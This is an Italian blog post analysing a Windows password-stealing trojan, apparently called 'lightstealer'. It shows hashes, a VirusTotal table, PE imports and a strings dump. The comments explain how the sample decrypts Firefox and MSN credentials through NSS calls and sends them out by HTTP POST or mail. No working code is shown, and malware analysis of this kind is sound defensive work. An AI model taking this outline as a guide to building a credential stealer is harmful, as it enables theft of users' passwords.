Drunk Geisha: Reverse Engineering su Linux

Qualche giorno fa stavo scrivendo su Skype con un mio amico e mi fa:" Guarda questo blog sicuramente ti piacerà è di un ragazzo che fa RE (reverse engineering)" io ci guardo un pò e gli dico : " ma è su windows!" e lui mi risponde :" be come vuoi fare Reverse Engineering ???"

...

Per questo Report ho utilizzato sia ida pro per Debian/GnuLinux che Qemu Zero-wine per Debian/GnuLinux

MD5 Sum: ddafe247beef63ccb926fbf8f69743fa

Visto da Virustotal.com:


Antivirus   Version   Last Update   Result
a-squared 4.5.0.24 2009.09.25 Trojan-PWS.Win32.Stealer!IK
AhnLab-V3 5.0.0.2 2009.09.24 Win-Trojan/Stealer.61952
AntiVir 7.9.1.25 2009.09.25 TR/Agent.61952
Antiy-AVL 2.0.3.7 2009.09.25 Trojan/Win32.Stealer.gen
Authentium 5.1.2.4 2009.09.25 -
Avast 4.8.1351.0 2009.09.24 -
AVG 8.5.0.412 2009.09.25 Generic13.BYDC
BitDefender 7.2 2009.09.25 Trojan.Generic.2463633
CAT-QuickHeal 10.00 2009.09.25 -
ClamAV 0.94.1 2009.09.25 Trojan.Spy-64234
Comodo 2432 2009.09.25 TrojWare.Win32.PSW.Delf.~B
DrWeb 5.0.0.12182 2009.09.25 -
eSafe 7.0.17.0 2009.09.24 -
eTrust-Vet 31.6.6760 2009.09.25 -
F-Prot 4.5.1.85 2009.09.24 -
F-Secure 8.0.14470.0 2009.09.25 Trojan-PSW.Win32.Stealer.w
Fortinet 3.120.0.0 2009.09.25 W32/Stealer.W!tr.pws
GData 19 2009.09.25 Trojan.Generic.2463633
Ikarus T3.1.1.72.0 2009.09.25 Trojan-PWS.Win32.Stealer
Jiangmin 11.0.800 2009.09.25 Trojan/PSW.Stealer.bn
K7AntiVirus 7.10.853 2009.09.24 -
Kaspersky 7.0.0.125 2009.09.25 Trojan-PSW.Win32.Stealer.w
McAfee 5751 2009.09.24 -
McAfee+Artemis 5751 2009.09.24 -
McAfee-GW-Edition 6.8.5 2009.09.25 Heuristic.LooksLike.Win32.PasswordStealer.H
Microsoft 1.5005 2009.09.23 -
NOD32 4456 2009.09.25 Win32/PSW.Delf.NSI
Norman 6.01.09 2009.09.24 -
nProtect 2009.1.8.0 2009.09.25 Trojan-PWS/W32.Agent.62464.C
Panda 10.0.2.2 2009.09.24 Trj/AOLPS.UB
PCTools 4.4.2.0 2009.09.25 -
Prevx 3.0 2009.09.25 -
Rising 21.48.43.00 2009.09.25 -
Sophos 4.45.0 2009.09.25 Troj/PWS-BEG
Sunbelt 3.2.1858.2 2009.09.24 -
Symantec 1.4.4.12 2009.09.25 -
TheHacker 6.5.0.2.017 2009.09.24 -
TrendMicro 8.950.0.1094 2009.09.25 -
VBA32 3.12.10.11 2009.09.25 Trojan-PSW.Win32.Stealer.w
ViRobot 2009.9.25.1956 2009.09.25 -
VirusBuster 4.6.5.0 2009.09.24 -
Additional information
File size: 62464 bytes
MD5...: ddafe247beef63ccb926fbf8f69743fa
SHA1..: fd13aa01f63ec5ab53b8dc79ad8acf6ab929328d
SHA256: 4384cee81b789e08c0ffb8911537020205f1de2f15ee683700dc558b1e433ade
ssdeep: 1536:HGIy8OgkxGVZ0QexBwNeEgm0dh/kkvZ9/9x:HGIy8rV3enFEYIU/9x
PEiD..: -
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0xc134
timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992)
machinetype.......: 0x14c (I386)

( 9 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0xa76c 0xa800 6.55 a1e897ffbf736747891241d5bcb92c62
.itext 0xc000 0xfd8 0x1000 5.83 096f208a28c87836ee442ac54ecde283
.data 0xd000 0xaf8 0xc00 1.99 dc14823419ba6a245f722b673d59601b
.bss 0xe000 0x3804 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.idata 0x12000 0xb9e 0xc00 4.84 bba371f3713ddeb9be7ba133b2e7c278
.tls 0x13000 0x8 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rdata 0x14000 0x18 0x200 0.21 837fbcb55aef26898bcc1cf60d98712a
.reloc 0x15000 0xe6c 0x1000 6.36 1f6a3d5d729113c1c56409d79e5465c4
.rsrc 0x16000 0xd54 0xe00 3.63 f6771ce6bb2b37a7fc0fa79cbdfe3727

( 10 imports )
> oleaut32.dll: SysFreeString, SysReAllocStringLen, SysAllocStringLen
> advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey
> user32.dll: GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
> kernel32.dll: GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
> kernel32.dll: TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
> user32.dll: TranslateMessage, MessageBoxA, LoadStringA, GetSystemMetrics, DispatchMessageA, CharNextA, CharToOemA
> kernel32.dll: WriteFile, VirtualQuery, Sleep, SizeofResource, ReadFile, LockResource, LoadResource, LoadLibraryA, GetVersionExA, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetFileSize, GetFileAttributesA, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetCurrentProcess, GetComputerNameA, GetCPInfo, FreeLibrary, FindResourceA, EnumCalendarInfoA, DeleteFileA, CreateFileA, CloseHandle
> advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, GetUserNameA
> advapi32.dll: CredEnumerateA
> wsock32.dll: WSACleanup, WSAStartup, gethostbyname, socket, send, inet_ntoa, inet_addr, htons, connect, closesocket

( 0 exports )
RDS...: NSRL Reference Data Set
-
pdfid.: -
trid..: Win32 Executable Generic (38.4%)
Win32 Dynamic Link Library (generic) (34.1%)
Win16/32 Executable Delphi generic (9.3%)
Generic Win/DOS Executable (9.0%)
DOS Executable Generic (9.0%)
ThreatExpert info: http://www.threatexpert.com/report.aspx?md5=ddafe247beef63ccb926fbf8f69743fa
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned

Vediamolo un pò più in dettaglio

Il programma è fatto in Delphi

FastMM Borland Edition
2004, 2005 Pierre le Riche / Professional Software Development

Il virus cerca di prendere le password di firefox e msn

SOFTWARE\
Mozilla
Firefox
CurrentVersion
\Main
Install Directory
PSWV
ZYYd
nspr4.dll
plc4.dll
plds4.dll
mozcrt19.dll
sqlite3.dll
nssutil3.dll
softokn3.dll
nss3.dll
NSS_Init
NSSBase64_DecodeBuffer
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
NSS_Shutdown
PK11_FreeSlot
APPDATA
\Mozilla\Firefox\profiles.ini
Path
Profile0
\Mozilla\Firefox\
--------------------
--------------------
(unnamed value)
PK11_Authenticate Failed!
PK11_GetInternalKeySlot Failed!
NSS_Init Failed!

decifrandole per poi collegarsi a un host remoto

SVW3
ZYYd
ZYYd
ZYYd
http
ZYYd
ZYYd
QSVW
$ZXw
ZYYd
ZYYd
ZYYd
HOST
3bkdhkvT5gQ
USER
PASS
LINK
si spedisce anche per mail
MAIL
ANTI1
TRUE

parti di sript per disabilitare antivirus

ANTI2
ANTI3
ANTI4
ANTI5
ANTI6
ANTI7
ANTI8
ANTI9
ANTI10
ANTI11
ANTI12
ANTI13
ANTI14
ANTI15

cercando di inviarle e formattando le password sia di msn che di firefox

--------------------
---------MSN--------
WindowsLive:name=*
Email:
Password:
FIREFOX
-------FIREFOX------
update
Crea il file c:/pass.txt
/pass.
.txt
MAILACTIVE
mail=
&message=
POST /
HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length:
Host:
Accept: text/html

e si conclude il processo

Entry point: 0000C134
Found OEP: 0040A688

Qua potete vedere il dump del file

Code:


00000667:  Professional Software Development
00001C7E: Unknown String
00001CDA: Unexpected Memory Leak
00002E80: RTL FPUMaskValue
00004B08: GetLongPathNameA
00004D54: Locales
00004D77: Locales
0000737C: ggg yyyy
000086EF: GetDiskFreeSpaceExA
00008CE4: CreateToolhelp32Snapshot
00008D06: Heap32ListFirst Heap32ListNext
00008D1E: Heap32First Heap32Next
00008D4A: Toolhelp32ReadProcessMemory Process32First
00008D59: Process32Next
00008D7A: Process32FirstW Process32NextW
00008D89: Thread32First
00008D98: Thread32Next
00008DA9: Module32First
00008DB8: Module32Next
00008DCA: Module32FirstW
00008DD9: Module32NextW
000091B1: IsDebuggerPresent
00009573: InsideTm
000095C4: username
0000968B: currentuser
0000969F: CurrentUser
00009D7B: Mozilla
00009D8B: Firefox
00009DBA: CurrentVersion
00009DE5: Install Directory
0000A586: DecodeBuffer
0000A59F: GetInternalKeySlot
0000A5B1: Authenticate
0000A5C3: Decrypt
0000A5D0: Shutdown
0000A5E1: FreeSlot
0000A5EB: APPDATA
0000A628: Profile0
0000A986: j j j j
0000B8A4: 3bkdhkvT5gQ USER
0000B8B8: DIR LINK
0000B922: ANTI10
0000B92A: ANTI11
0000B932: ANTI12
0000B93A: ANTI13
0000B942: ANTI14
0000B94A: ANTI15
0000B9E3: FIREFOX
0000BAAE: u update
0000BAE6: MAILACTIVE
0000BB55:  close
0000BB8F: urlencoded
0000C375: Runtime error     at 00000000
0000CC91: SysFreeString
0000CCA7: SysReAllocStringLen
0000CCBB: SysAllocStringLen
0000CCDC: RegQueryValueExA
0000CCED: RegOpenKeyExA
0000CCFB: RegCloseKey
0000CD19: GetKeyboardType
0000CD29: DestroyWindow
0000CD37: LoadStringA
0000CD45: MessageBoxA
0000CD51: CharNextA
0000CD68: GetACP
0000CD7F: VirtualFree
0000CD8E: VirtualAlloc
0000CD9E: GetTickCount
0000CDB9: QueryPerformanceCounter
0000CDCE: GetCurrentThreadId
0000CDDE: VirtualQuery
0000CDF5: WideCharToMultiByte
0000CE0B: MultiByteToWideChar
0000CE16: lstrlenA
0000CE23: lstrcpynA
0000CE34: LoadLibraryExA
0000CE47: GetThreadLocale
0000CE59: GetStartupInfoA
0000CE6A: GetProcAddress
0000CE7E: GetModuleHandleA
0000CE94: GetModuleFileNameA
0000CEA6: GetLocaleInfoA
0000CEB6: GetLastError
0000CEC9: GetCommandLineA
0000CED7: FreeLibrary
0000CEE8: FindFirstFileA
0000CEF5: FindClose
0000CF03: ExitProcess
0000CF0F: WriteFile
0000CF2A: UnhandledExceptionFilter
0000CF3C: SetFilePointer
0000CF4C: SetEndOfFile
0000CF59: RtlUnwind
0000CF64: ReadFile
0000CF76: RaiseException
0000CF86: GetStdHandle
0000CF95: GetFileSize
0000CFA3: GetFileType
0000CFB1: CreateFileA
0000CFBF: CloseHandle
0000CFDB: TlsSetValue
0000CFE9: TlsGetValue
0000CFF6: LocalAlloc
0000D00A: GetModuleHandleA
0000D02A: TranslateMessage
0000D039: MessageBoxA
0000D047: LoadStringA
0000D05A: GetSystemMetrics
0000D06E: DispatchMessageA
0000D07B: CharNextA
0000D088: CharToOemA
0000D0A3: WriteFile
0000D0B2: VirtualQuery
0000D0CC: SizeofResource
0000D0D8: ReadFile
0000D0E8: LockResource
0000D0F8: LoadResource
0000D108: LoadLibraryA
0000D119: GetVersionExA
0000D128: GetTickCount
0000D13B: GetThreadLocale
0000D14A: GetStdHandle
0000D15C: GetProcAddress
0000D178: GetPrivateProfileStringA
0000D18C: GetModuleHandleA
0000D1A2: GetModuleFileNameA
0000D1B4: GetLocaleInfoA
0000D1C3: GetFileSize
0000D1D8: GetFileAttributesA
0000D1F3: GetEnvironmentVariableA
0000D207: GetDiskFreeSpaceA
0000D21B: GetCurrentProcess
0000D22E: GetComputerNameA
0000D23B: GetCPInfo
0000D249: FreeLibrary
0000D259: FindResourceA
0000D26D: EnumCalendarInfoA
0000D27B: DeleteFileA
0000D289: CreateFileA
0000D297: CloseHandle
0000D2B8: RegQueryValueExA
0000D2C9: RegOpenKeyExA
0000D2D7: RegCloseKey
0000D2EA: OpenProcessToken
0000D2FA: GetUserNameA
0000D31A: CredEnumerateA
0000D334: WSACleanup
0000D342: WSAStartup
0000D353: gethostbyname
0000D35C: socket
0000D38F: connect
0000D39D: closesocket
0000E168: 7 74787h7
0000E88D: D V C L A L
0000E89D: F I R E F O X
0000E8AF: H O S T
0000E8C7: P A C K A G E I N F O
0000E8D1: P A S S
0000E8DB: U S E R
0000E8ED: N o v e m b e r
0000E8FF: D e c e m b e r
0000E945: S u n d a y
0000E953: M o n d a y
0000E963: T u e s d a y
0000E977: W e d n e s d a y
0000E989: T h u r s d a y
0000E997: F r i d a y
0000E9A9: S a t u r d a y
0000E9EB: J a n u a r y
0000E9FD: F e b r u a r y
0000EA09: M a r c h
0000EA15: A p r i l
0000EA27: J u n e
0000EA31: J u l y
0000EA3F: A u g u s t
0000EA53: S e p t e m b e r
0000EA63: O c t o b e r
0000EA73: I n v a l i d
0000EA83: v a r i a n t
0000EA8D: t y p e
0000EAA3: c o n v e r s i o n
0000EAB3: I n v a l i d
0000EAC3: v a r i a n t
0000EAD7: o p e r a t i o n
0000EAE7: I n v a l i d
0000EAF9: a r g u m e n t
0000EB0B: E x t e r n a l
0000EB1F: e x c e p t i o n
0000EB39: A s s e r t i o n
0000EB47: f a i l e d
0000EB5B: I n t e r f a c e
0000EB77: s u p p o r t e d
0000EB8B: E x c e p t i o n
0000EBA3: s a f e c a l l
0000EBB1: m e t h o d
0000EBCB: l i n e
0000EBE5: A b s t r a c t
0000EBF1: E r r o r
0000EBFF: A c c e s s
0000EC13: v i o l a t i o n
0000EC29: a d d r e s s
0000EC43: m o d u l e
0000EC6B: a d d r e s s
0000ECB3: I n v a l i d
0000ECC3: p o i n t e r
0000ECD7: o p e r a t i o n
0000ECE7: I n v a l i d
0000ECF3: c l a s s
0000ED13: t y p e c a s t 0 A c c e s s
0000ED27: v i o l a t i o n
0000ED3D: a d d r e s s
0000ED61: a d d r e s s
0000ED75: A c c e s s
0000ED89: v i o l a t i o n
0000ED95: S t a c k
0000EDA7: o v e r f l o w
0000EDB7: C o n t r o l
0000EDD9: P r i v i l e g e d
0000EDF1: i n s t r u c t i o n
0000EE05: E x c e p t i o n
0000EE1F: m o d u l e
0000EE5B: A p p l i c a t i o n
0000EE75: E r r o r 1 F o r m a t
0000EE8F: i n v a l i d
0000EEAF: i n c o m p a t i b l e
0000EEB9: w i t h
0000EECB: a r g u m e n t
0000EEE3: a r g u m e n t
0000EEF9: f o r m a t
0000EF13: V a r i a n t
0000EF21: m e t h o d
0000EF2D: c a l l s
0000EF49: s u p p o r t e d
0000EF53: R e a d
0000EF5F: W r i t e
0000EF6B: E r r o r
0000EF7D: c r e a t i n g
0000EF8D: v a r i a n t
0000EF9D: s a f e
0000EFA9: a r r a y
0000EFB9: V a r i a n t
0000EFC9: s a f e
0000EFD5: a r r a y
0000EFE1: i n d e x
0000EFFD: b o u n d s
0000F01B: m e m o r y
0000F02F: e r r o r
0000F03F: F i l e
0000F053: f o u n d
0000F063: I n v a l i d
0000F075: f i l e n a m e
0000F087: m a n y
0000F091: o p e n
0000F09D: f i l e s
0000F0A7: F i l e
0000F0B5: a c c e s s
0000F0C3: d e n i e d
0000F0CD: R e a d
0000F0DB: b e y o n d
0000F0F3: f i l e
0000F0FD: D i s k
0000F107: f u l l
0000F117: I n v a l i d
0000F127: n u m e r i c
0000F133: i n p u t
0000F145: D i v i s i o n
0000F155: z e r o
0000F161: R a n g e
0000F16D: c h e c k
0000F179: e r r o r
0000F189: I n t e g e r
0000F19B: o v e r f l o w
0000F1AB: I n v a l i d
0000F1BD: f l o a t i n g
0000F1C9: p o i n t
0000F1DD: o p e r a t i o n
0000F1EF: F l o a t i n g
0000F1FB: p o i n t
0000F20D: d i v i s i o n
0000F21D: z e r o
0000F22F: F l o a t i n g
0000F23B: p o i n t
0000F24D: o v e r f l o w
0000F25F: F l o a t i n g
0000F26B: p o i n t
0000F27F: u n d e r f l o w
0000F2CA: lightstealer
0000F2D4: WinSock
0000F2DE: KWindows
0000F2E6: UTypes
0000F2F0: SysInit
0000F2F9: System
0000F30B: TlHelp32
0000F316: CryptApi
0000F320: WinInet
0000F32B: SysUtils
0000F336: ImageHlp
0000F341: SysConst
0000F341: SysConst